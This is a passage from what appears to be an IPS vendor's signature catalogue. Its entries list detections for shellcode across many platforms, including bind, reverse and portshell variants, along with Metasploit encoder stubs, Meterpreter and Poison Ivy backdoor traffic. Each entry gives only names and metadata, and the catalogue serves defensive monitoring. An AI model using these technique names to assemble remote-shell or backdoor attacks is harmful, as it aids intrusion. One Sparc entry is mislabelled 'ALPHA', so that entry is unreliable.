Tags: Windows, Any Hardware, Oracle 9i, CVE2003, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-32-1210
Last changed: sgpkg-ips-579-5211
Vulnerability: Oracle-9i-Xml-Database-BOF
Description:
Back to top

Shared_PARISC-ShellCode-Detect

About this situation: Possible PA-RISC shellcode seen in a tcp connection
Context: Any TCP Client Stream
Severity: 8
Tags: Any Operating System, PA-RISC, Any Operating System not specific, System Inspections, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic, Shellcode Correlation Dependency Group
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-148-2032
Description:
Back to top

Shared_Possible-X86-Buffer-Overflow-Exploit

About this situation: Possible X86 Buffer Overflow Exploit
Context: Any TCP Client Stream
Severity: 7
Tags: Unix, x86, Unix not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-261-3038
Last changed: sgpkg-ips-593-5211
Description:
Back to top

Shared_PPC-ShellCode-Detect

About this situation: Possible PPC shellcode seen in a TCP connection
Context: Any TCP Client Stream
Severity: 7
Tags: Any Operating System, POWER, Any Operating System not specific, System Inspections, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic, Shellcode Correlation Dependency Group
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-640-5211
Description:
Back to top

Shared_RTSP-Protocol-Usage

About this situation: Detects RTSP stream usage
Context: Any TCP Client Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Streaming Protocols, TCP Client Traffic
First detected in: sgpkg-ips-47-1210
Last changed: sgpkg-ips-1399-5242
Vulnerability: RTSP-Protocol-Usage
Description:
Back to top

Shared_ShellCode-AIX-Execve

About this situation: Shellcode
Context: Any TCP Client Stream
Severity: 10
Tags: AIX, Any Hardware, AIX not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-6-1102
Last changed: sgpkg-ips-148-2032
Vulnerability: Generic-AIX-ShellCode
Description:
Back to top

Shared_ShellCode-BSD-PPC-Execve

About this situation: Shellcode
Context: Any TCP Client Stream
Severity: 10
Tags: BSD, POWER, BSD not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-6-1102
Last changed: sgpkg-ips-165-2032
Vulnerability: Generic-BSD-PPC-ShellCode
Description:
Back to top

Shared_ShellCode-BSDi-Execve

About this situation: Shellcode
Context: Any TCP Client Stream
Severity: 10
Tags: BSDi, Any Hardware, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-6-1102
Last changed: sgpkg-ips-165-2032
Vulnerability: Generic-BSDi-ShellCode
Description:
Back to top

Shared_ShellCode-BSDi-Execve-2

About this situation: Shellcode
Context: Any TCP Client Stream
Severity: 10
Tags: BSDi, Any Hardware, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-6-1102
Last changed: sgpkg-ips-165-2032
Vulnerability: Generic-BSDi-ShellCode
Description:
Back to top

Shared_ShellCode-BSDi-Execve-Toupper-Evasion

About this situation: Shellcode
Context: Any TCP Client Stream
Severity: 10
Tags: BSDi, Any Hardware, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-6-1102
Last changed: sgpkg-ips-148-2032
Vulnerability: Generic-BSDi-ShellCode
Description:
Back to top

Shared_ShellCode-DG-UX-Execve

About this situation: Shellcode
Context: Any TCP Client Stream
Severity: 10
Tags: DG UX, Any Hardware, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-6-1102
Last changed: sgpkg-ips-148-2032
Vulnerability: Generic-DG-UX-ShellCode
Description:
Back to top

Shared_ShellCode-FreeBSD-Execve

About this situation: Shellcode
Context: Any TCP Client Stream
Severity: 7
Tags: FreeBSD, Any Hardware, FreeBSD not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-6-1102
Last changed: sgpkg-ips-165-2032
Vulnerability: Generic-FreeBSD-ShellCode
Description:
Back to top

Shared_ShellCode-FreeBSD-Passive-Connect

About this situation: Shellcode
Context: Any TCP Client Stream
Severity: 10
Tags: FreeBSD, Any Hardware, FreeBSD not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-6-1102
Last changed: sgpkg-ips-148-2032
Vulnerability: Generic-FreeBSD-ShellCode
Description:
Back to top

Shared_ShellCode-HP-UX-Execve

About this situation: Shellcode
Context: Any TCP Client Stream
Severity: 10
Tags: HP-UX, Any Hardware, HP-UX not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-6-1102
Last changed: sgpkg-ips-148-2032
Vulnerability: Generic-HP-UX-ShellCode
Description:
Back to top

Shared_ShellCode-Linux-PPC-Execve

About this situation: Shellcode
Context: Any TCP Client Stream
Severity: 10
Tags: Linux, POWER, Linux not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-6-1102
Last changed: sgpkg-ips-148-2032
Vulnerability: Generic-Linux-PPC-ShellCode
Description:
Back to top

Shared_ShellCode-Linux-Sparc-Setreuid-Execve

About this situation: Shellcode
Context: Any TCP Client Stream
Severity: 10
Tags: Linux, Sparc, Linux not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-6-1102
Last changed: sgpkg-ips-148-2032
Vulnerability: Generic-Linux-Sparc-ShellCode
Description:
Back to top

Shared_ShellCode-Linux-Sparc-Setreuid-Execve2

About this situation: Shellcode
Context: Any TCP Client Stream
Severity: 10
Tags: Linux, Sparc, Linux not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-6-1102
Last changed: sgpkg-ips-148-2032
Vulnerability: Generic-Linux-Sparc-ShellCode
Description:
Back to top

Shared_ShellCode-Linux-Sparc-Setreuid-Setregid-Execve

About this situation: Shellcode
Context: Any TCP Client Stream
Severity: 10
Tags: Linux, Sparc, Linux not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-6-1102
Last changed: sgpkg-ips-148-2032
Vulnerability: Generic-Linux-Sparc-ShellCode
Description:
Back to top

Shared_ShellCode-Linux-Sparc-Setreuid-Tolower-Execve

About this situation: Shellcode
Context: Any TCP Client Stream
Severity: 10
Tags: Linux, Sparc, Linux not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-6-1102
Last changed: sgpkg-ips-148-2032
Vulnerability: Generic-Linux-Sparc-ShellCode
Description:
Back to top

Shared_ShellCode-Linux-Sparc-Setuid-Execve

About this situation: Shellcode
Context: Any TCP Client Stream
Severity: 10
Tags: Linux, Sparc, Linux not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-6-1102
Last changed: sgpkg-ips-148-2032
Vulnerability: Generic-Linux-Sparc-ShellCode
Description:
Back to top

Shared_ShellCode-Linux-X86-Bind

About this situation: Shellcode
Context: Any TCP Client Stream
Severity: 10
Tags: Linux, x86, Linux not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-6-1102
Last changed: sgpkg-ips-148-2032
Vulnerability: Generic-Linux-X86-ShellCode
Description:
Back to top

Shared_ShellCode-Linux-X86-Chroot-Break-1

About this situation: Shellcode
Context: Any TCP Client Stream
Severity: 10
Tags: Linux, x86, Linux not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-6-1102
Last changed: sgpkg-ips-148-2032
Vulnerability: Generic-Linux-X86-ShellCode
Description:
Back to top

Shared_ShellCode-Linux-X86-Chroot-Break-2

About this situation: Shellcode
Context: Any TCP Client Stream
Severity: 10
Tags: Linux, x86, Linux not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-6-1102
Last changed: sgpkg-ips-148-2032
Vulnerability: Generic-Linux-X86-ShellCode
Description:
Back to top

Shared_ShellCode-Linux-X86-Chroot-Break-3

About this situation: Shellcode
Context: Any TCP Client Stream
Severity: 10
Tags: Linux, x86, Linux not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-6-1102
Last changed: sgpkg-ips-148-2032
Vulnerability: Generic-Linux-X86-ShellCode
Description:
Back to top

Shared_ShellCode-Linux-X86-Connect

About this situation: Shellcode
Context: Any TCP Client Stream
Severity: 10
Tags: Linux, x86, Linux not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-6-1102
Last changed: sgpkg-ips-148-2032
Vulnerability: Generic-Linux-X86-ShellCode
Description:
Back to top

Shared_ShellCode-Linux-X86-Drop-Shell

About this situation: Shellcode
Context: Any TCP Client Stream
Severity: 10
Tags: Linux, x86, Linux not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-6-1102
Last changed: sgpkg-ips-148-2032
Vulnerability: Generic-Linux-X86-ShellCode
Description:
Back to top

Shared_ShellCode-Linux-X86-Execve-0xff-Less

About this situation: Shellcode
Context: Any TCP Client Stream
Severity: 10
Tags: Linux, x86, Linux not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-6-1102
Last changed: sgpkg-ips-148-2032
Vulnerability: Generic-Linux-X86-ShellCode
Description:
Back to top

Shared_ShellCode-Linux-X86-Execve-Binsh-1

About this situation: Shellcode
Context: Any TCP Client Stream
Severity: 10
Tags: Linux, x86, Linux not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-6-1102
Last changed: sgpkg-ips-148-2032
Vulnerability: Generic-Linux-X86-ShellCode
Description:
Back to top

Shared_ShellCode-Linux-X86-Execve-Binsh-2

About this situation: Shellcode
Context: Any TCP Client Stream
Severity: 10
Tags: Linux, x86, Linux not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-6-1102
Last changed: sgpkg-ips-148-2032
Vulnerability: Generic-Linux-X86-ShellCode
Description:
Back to top

Shared_ShellCode-Linux-X86-Execve-Tolower-Evasion

About this situation: Shellcode
Context: Any TCP Client Stream
Severity: 10
Tags: Linux, x86, Linux not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-6-1102
Last changed: sgpkg-ips-148-2032
Vulnerability: Generic-Linux-X86-ShellCode
Description:
Back to top

Shared_ShellCode-Linux-X86-Execve-Toupper-Evasion

About this situation: Shellcode
Context: Any TCP Client Stream
Severity: 10
Tags: Linux, x86, Linux not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-6-1102
Last changed: sgpkg-ips-148-2032
Vulnerability: Generic-Linux-X86-ShellCode
Description:
Back to top

Shared_ShellCode-Linux-X86-File-Append

About this situation: Shellcode
Context: Any TCP Client Stream
Severity: 10
Tags: Linux, x86, Linux not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-6-1102
Last changed: sgpkg-ips-148-2032
Vulnerability: Generic-Linux-X86-ShellCode
Description:
Back to top

Shared_ShellCode-Linux-X86-Mini-Sh

About this situation: Shellcode
Context: Any TCP Client Stream
Severity: 10
Tags: Linux, x86, Linux not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-6-1102
Last changed: sgpkg-ips-148-2032
Vulnerability: Generic-Linux-X86-ShellCode
Description:
Back to top

Shared_ShellCode-Linux-X86-Portshell

About this situation: Shellcode
Context: Any TCP Client Stream
Severity: 10
Tags: Linux, x86, Linux not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-6-1102
Last changed: sgpkg-ips-148-2032
Vulnerability: Generic-Linux-X86-ShellCode
Description:
Back to top

Shared_ShellCode-Linux-X86-Reverse-Telnet

About this situation: Shellcode
Context: Any TCP Client Stream
Severity: 10
Tags: Linux, x86, Linux not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-6-1102
Last changed: sgpkg-ips-148-2032
Vulnerability: Generic-Linux-X86-ShellCode
Description:
Back to top

Shared_ShellCode-Linux-X86-SCC

About this situation: Shellcode
Context: Any TCP Client Stream
Severity: 10
Tags: Linux, x86, Linux not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-6-1102
Last changed: sgpkg-ips-148-2032
Vulnerability: Generic-Linux-X86-ShellCode
Description:
Back to top

Shared_ShellCode-Linux-X86-Setregid-Execve

About this situation: Shellcode
Context: Any TCP Client Stream
Severity: 10
Tags: Linux, x86, Linux not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-6-1102
Last changed: sgpkg-ips-148-2032
Vulnerability: Generic-Linux-X86-ShellCode
Description:
Back to top

Shared_ShellCode-Linux-X86-Tmp-Sh

About this situation: Shellcode
Context: Any TCP Client Stream
Severity: 10
Tags: Linux, x86, Linux not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-6-1102
Last changed: sgpkg-ips-148-2032
Vulnerability: Generic-Linux-X86-ShellCode
Description:
Back to top

Shared_ShellCode-Linux-X86-Write-1

About this situation: Shellcode
Context: Any TCP Client Stream
Severity: 10
Tags: Linux, x86, Linux not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-6-1102
Last changed: sgpkg-ips-148-2032
Vulnerability: Generic-Linux-X86-ShellCode
Description:
Back to top

Shared_ShellCode-Linux-X86-Write-2

About this situation: Shellcode
Context: Any TCP Client Stream
Severity: 10
Tags: Linux, x86, Linux not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-6-1102
Last changed: sgpkg-ips-148-2032
Vulnerability: Generic-Linux-X86-ShellCode
Description:
Back to top

Shared_ShellCode-Linux-X86-Xterm

About this situation: Shellcode
Context: Any TCP Client Stream
Severity: 10
Tags: Linux, x86, Linux not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-6-1102
Last changed: sgpkg-ips-148-2032
Vulnerability: Generic-Linux-X86-ShellCode
Description:
Back to top

Shared_ShellCode-NetBSD-Execve

About this situation: Shellcode
Context: Any TCP Client Stream
Severity: 10
Tags: NetBSD, Any Hardware, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-6-1102
Last changed: sgpkg-ips-148-2032
Vulnerability: Generic-NetBSD-ShellCode
Description:
Back to top

Shared_ShellCode-OpenBSD-Passwd-Modify

About this situation: Shellcode
Context: Any TCP Client Stream
Severity: 10
Tags: OpenBSD, Any Hardware, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-6-1102
Last changed: sgpkg-ips-148-2032
Vulnerability: Generic-OpenBSD-ShellCode
Description:
Back to top

Shared_ShellCode-OpenBSD-Portshell

About this situation: Shellcode
Context: Any TCP Client Stream
Severity: 10
Tags: OpenBSD, Any Hardware, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-6-1102
Last changed: sgpkg-ips-148-2032
Vulnerability: Generic-OpenBSD-ShellCode
Description:
Back to top

Shared_ShellCode-OpenBSD-Reverse-Portshell

About this situation: Shellcode
Context: Any TCP Client Stream
Severity: 10
Tags: OpenBSD, Any Hardware, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-6-1102
Last changed: sgpkg-ips-148-2032
Vulnerability: Generic-OpenBSD-ShellCode
Description:
Back to top

Shared_ShellCode-SCO-OpenServer-Chroot-Break

About this situation: Shellcode
Context: Any TCP Client Stream
Severity: 10
Tags: SCO, Any Hardware, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-6-1102
Last changed: sgpkg-ips-148-2032
Vulnerability: Generic-SCO-OpenServer-ShellCode
Description:
Back to top

Shared_ShellCode-SCO-OpenServer-Execve

About this situation: Shellcode
Context: Any TCP Client Stream
Severity: 10
Tags: SCO, Any Hardware, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-6-1102
Last changed: sgpkg-ips-165-2032
Vulnerability: Generic-SCO-OpenServer-ShellCode
Description:
Back to top

Shared_ShellCode-SCO-UnixWare-Execve

About this situation: Shellcode
Context: Any TCP Client Stream
Severity: 10
Tags: SCO, Any Hardware, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-6-1102
Last changed: sgpkg-ips-148-2032
Vulnerability: Generic-SCO-UnixWare-ShellCode
Description:
Back to top

Shared_ShellCode-Solaris-Sparc-Portbind

About this situation: Shellcode
Context: Any TCP Client Stream
Severity: 10
Tags: Solaris, Sparc, Solaris not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-6-1102
Last changed: sgpkg-ips-148-2032
Vulnerability: Generic-Solaris-Sparc-ShellCode
Description:
Back to top

Shared_ShellCode-Solaris-Sparc-Setreuid-Execve

About this situation: Shellcode
Context: Any TCP Client Stream
Severity: 10
Tags: Solaris, Sparc, Solaris not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-6-1102
Last changed: sgpkg-ips-148-2032
Vulnerability: Generic-Solaris-Sparc-ShellCode
Description:
Back to top

Shared_ShellCode-Solaris-X86-Ingreslock

About this situation: Shellcode
Context: Any TCP Client Stream
Severity: 10
Tags: Solaris, x86, Solaris not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-6-1102
Last changed: sgpkg-ips-148-2032
Vulnerability: Generic_Solaris_X86-ShellCode
Description:
Back to top

Shared_ShellCode-Solaris-X86-Setuid-Execve

About this situation: Shellcode
Context: Any TCP Client Stream
Severity: 10
Tags: Solaris, x86, Solaris not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-6-1102
Last changed: sgpkg-ips-148-2032
Vulnerability: Generic_Solaris_X86-ShellCode
Description:
Back to top

Shared_ShellCode-Solaris-X86-Toupper-Execve

About this situation: Shellcode
Context: Any TCP Client Stream
Severity: 10
Tags: Solaris, x86, Solaris not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-6-1102
Last changed: sgpkg-ips-148-2032
Vulnerability: Generic_Solaris_X86-ShellCode
Description:
Back to top

Shared_Sparc-ShellCode-Detect

About this situation: Possible ALPHA shellcode seen in a TCP connection
Context: Any TCP Client Stream
Severity: 7
Tags: Any Operating System, Sparc, Any Operating System not specific, System Inspections, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic, Shellcode Correlation Dependency Group
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-148-2032
Description:
Back to top

Shared_SS-BitTorrent-Network-Connect

About this situation: BitTorrent p2p network connection attempt
Context: Any TCP Server Stream
Severity: 2
Tags: Any Operating System, Any Hardware, BitTorrent, Any Operating System not specific, BitTorrent not specific, Peer to Peer, TCP Server Traffic
First detected in: sgpkg-ips-360-4219
Last changed: sgpkg-ips-516-5211
Vulnerability: BitTorrent-Peer-To-Peer-Network-Usage
Description:
Back to top

Shared_SS-BitTorrent-Tracker-Response

About this situation: Detects BitTorrent tracker responses
Context: Any TCP Server Stream
Severity: 2
Tags: Any Operating System, Any Hardware, BitTorrent, Any Operating System not specific, BitTorrent not specific, Peer to Peer, TCP Server Traffic
First detected in: sgpkg-ips-129-2032
Last changed: sgpkg-ips-534-5211
Vulnerability: BitTorrent-Peer-To-Peer-Network-Usage
Description:
Back to top

Shared_SS-DivX-Player-Subtitle-Parsing-Buffer-Overflow

About this situation: Suspicious subtitles file detected.
Context: Any TCP Server Stream
Severity: 7
Tags: Windows, Any Hardware, DivX Player, CVE2008, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-151-2032
Last changed: sgpkg-ips-152-2032
Vulnerability: DivX-Player-Subtitle-Parsing-Buffer-Overflow
Description:
Back to top

Shared_SS-Flash-Video-Download

About this situation: Flash Video download detected
Context: Any TCP Server Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Adobe Flash Player, Any Operating System not specific, Streaming Protocols, TCP Server Traffic
First detected in: sgpkg-ips-172-2032
Last changed: sgpkg-ips-173-2032
Vulnerability: Adobe-Flash-Media-Content
Description:
Back to top

Shared_SS-Generic-Shellcode-Base64-Kernel32

About this situation: An encoded reference to kernel32.dll was detected
Context: Any TCP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-788-5211
Last changed: sgpkg-ips-788-5211
Vulnerability: Shellcode-Encoder
Description:
Back to top

Shared_SS-Metasploit-Meterpreter-Download

About this situation: Metasploit Meterpreter download detected
Context: Any TCP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-416-4219
Last changed: sgpkg-ips-554-5211
Vulnerability: Shellcode-Encoder
Description:
Back to top

Shared_SS-Metasploit-Meterpreter-Injection

About this situation: Metasploit Meterpreter injection detected
Context: Any TCP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-335-4219
Last changed: sgpkg-ips-335-4219
Vulnerability: Shellcode-Encoder
Description:
Back to top

Shared_SS-Metasploit-Shellcode-Mipsbe-Byte-Xori-Stub

About this situation: Metasploit mipsbe/byte_xori shellcode encoder stub detected
Context: Any TCP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-690-5211
Last changed: sgpkg-ips-690-5211
Vulnerability: Shellcode-Encoder
Description:
Back to top

Shared_SS-Metasploit-Shellcode-Mipsle-Byte-Xori-Stub

About this situation: Metasploit mipsle/byte_xori shellcode encoder stub detected
Context: Any TCP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-690-5211
Last changed: sgpkg-ips-690-5211
Vulnerability: Shellcode-Encoder
Description:
Back to top

Shared_SS-Metasploit-Shellcode-PPC-Longxor-Stub

About this situation: Metasploit ppc/Longxor shellcode encoder stub detected
Context: Any TCP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-690-5211
Last changed: sgpkg-ips-690-5211
Vulnerability: Shellcode-Encoder
Description:
Back to top

Shared_SS-Metasploit-Shellcode-Sparc-Longxor-Tag-Stub

About this situation: Metasploit sparc/longxor_tag shellcode encoder stub detected
Context: Any TCP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-690-5211
Last changed: sgpkg-ips-690-5211
Vulnerability: Shellcode-Encoder
Description:
Back to top

Shared_SS-Metasploit-Shellcode-x86-Context-Cpuid-Stub

About this situation: Metasploit x86/context_cpuid shellcode encoder stub detected
Context: Any TCP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-683-5211
Last changed: sgpkg-ips-685-5211
Vulnerability: Shellcode-Encoder
Description:
Back to top

Shared_SS-Metasploit-Shellcode-x86-Context-Stat-Stub

About this situation: Metasploit x86/context_stat shellcode encoder stub detected
Context: Any TCP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-683-5211
Last changed: sgpkg-ips-683-5211
Vulnerability: Shellcode-Encoder
Description:
Back to top

Shared_SS-Metasploit-Shellcode-x86-Context-Time-Stub

About this situation: Metasploit x86/context_time shellcode encoder stub detected
Context: Any TCP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-683-5211
Last changed: sgpkg-ips-683-5211
Vulnerability: Shellcode-Encoder
Description:
Back to top

Shared_SS-OpenSSL-CMS-Structure-OriginatorInfo-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in OpenSSL detected
Context: Any TCP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, OpenSSL, CVE2010, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-319-4219
Last changed: sgpkg-ips-326-4219
Vulnerability: OpenSSL-CMS-Structure-OriginatorInfo-Memory-Corruption
Description:
Back to top

Shared_SS-Poison-Ivy-Traffic

About this situation: Poison Ivy backdoor network traffic detected
Context: Any TCP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-625-5211
Last changed: sgpkg-ips-625-5211
Vulnerability: Backdoor-Poison-Ivy
Description:
Back to top

Shared_SS-Shared-Variables

About this situation: This fingerprint sets shared variables
Context: Any TCP Server Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, System Inspections, TCP Server Traffic
First detected in: sgpkg-ips-439-4219
Last changed: sgpkg-ips-988-5242
Vulnerability: Generic-Shared-Variables
Description:
Back to top

Shared_SS-SOCKS4-Connection-Request-Accepted

About this situation: SOCKS4 connection request accepted
Context: Any TCP Server Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Tunneling Protocols, TCP Server Traffic
First detected in: sgpkg-ips-322-4219
Last changed: sgpkg-ips-322-4219
Vulnerability: SOCKS4-Protocol
Description:
Back to top

Shared_SS-SOCKS4-Connection-Request-Failed

About this situation: SOCKS4 connection request failed
Context: Any TCP Server Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Tunneling Protocols, TCP Server Traffic
First detected in: sgpkg-ips-322-4219
Last changed: sgpkg-ips-322-4219
Vulnerability: SOCKS4-Protocol
Description:
Back to top

Shared_SS-SOCKS5-Connection-Request-Accepted

About this situation: SOCKS5 connection request accepted
Context: Any TCP Server Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Tunneling Protocols, TCP Server Traffic
First detected in: sgpkg-ips-322-4219
Last changed: sgpkg-ips-439-4219
Vulnerability: SOCKS5-Protocol
Description:
Back to top

Shared_SS-SOCKS5-Connection-Request-Failed

About this situation: SOCKS5 connection request failed
Context: Any TCP Server Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Tunneling Protocols, TCP Server Traffic
First detected in: sgpkg-ips-322-4219
Last changed: sgpkg-ips-439-4219
Vulnerability: SOCKS5-Protocol
Description:
Back to top

Shared_SS-Suspicious-Windows-API-Stub

About this situation: Suspicious Windows API call stub detected
Context: Any TCP Server Stream
Severity: 7
